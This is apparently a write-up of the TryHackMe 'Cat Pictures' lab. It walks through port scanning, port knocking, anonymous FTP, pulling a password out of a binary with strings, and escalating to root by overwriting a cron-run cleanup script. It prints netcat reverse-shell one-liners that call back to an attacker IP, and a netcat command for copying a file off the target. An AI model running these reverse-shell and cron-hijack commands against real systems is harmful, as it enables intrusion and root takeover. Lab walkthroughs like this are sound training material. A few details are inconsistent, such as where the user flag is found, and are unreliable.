Cat Pictures — TryHackMe
I made a forum where you can post cute cat pictures!

This is a write-up for TryHackMe’s room named Cat Pictures. We first needed to find out the port where the web-server is running, which while navigating gave us a hint to perform Port-Knocking.Then we needed to do a bit of binary reversing and then a nice privesc from a docker environment.
Let’s start with finding out what all services are running:
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.90.64
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,2375,4420,8080 10.10.90.64
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open nvm-express?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
| Please enter password:
| Invalid password...
| Connection Closed
| NULL, RPCCheck:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
|_ Please enter password:
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
*Note that FTP ports is filtered.
Web Server
Check out the web server running at port 8080. Browsing around we found w user comment at http://10.10.84.51:8080/viewtopic.php?f=2&t=2, which talks about knocking:

It looks as if we have been told to knock on the server using the sequence give.
Port Knocking
Read for Port Knocking here and use knock
program and run:
knock 10.10.84.51 1111 2222 3333 4444
Run this command few times and run the NMAP scan again to see if there is any difference in the Port Scan results:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy
Now FTP port is in OPEN state.
FTP
Connect to the FTP server using anonymous:
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.84.51
Connected to 10.10.84.51.
220 (vsFTPd 3.0.3)
Name (10.10.84.51:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (676.0817 kB/s)
ftp> quit
221 Goodbye.
Note.txt gives is a hint:

SHELL
Connect to port 4420 using netcat
:

It looks like a very limited shell. After navigating used this to get a better shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 9999 >/tmp/f
and captured the reverse shell:

In /home/catlover
directory found an executable runme
. Running this exe ask for a password:

Copy over this exe to our kali machine using netcat
to analyse further:
Receiving side
nc -l -p 8888 > runmeSending side
nc 10.8.98.192 8888 < runme
Run strings
on this exe, we can see a potential password:

Now run the exe and use this password:

User Flag
We got a SSH private key. Copy this key and change its permission to 600
and try to connect to the server with user catlover
:
ssh -i id_rsa catlover@10.10.84.51

We got our first flag at /root/flag.txt

Root Flag
It looks like we are in a docker environment. Let’s run LINPEAS to find out have can be escalate our privileges. We can see that a strange directory shows up in the scan :

Investigating /opt/clean
directory further shows a script:
root@7546fa2336d6:/# ls -lrt /opt/clean/
total 4
-rw-r--r-- 1 root root 27 May 1 00:20 clean.sh
root@7546fa2336d6:/#
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bashrm -rf /tmp/*
root@7546fa2336d6:/#
Looks like it is cleaning /tmp directory. May be /opt/clean/clean.sh
is running as a cronjob. To test this,we will add another reverse shell here in /op/clean/clean.sh
and try to capture that at our end:
root@7546fa2336d6:/# echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.98.192 7777 >/tmp/f" > /opt/clean/clean.sh
Start nc
listener on kali and wait for the cronjob to run:

Sure enough we got our shell in sometime. The root flag was at /root/root.txt
This was a nice and easy room. Hope you enjoyed the write-up. Thanks for reading.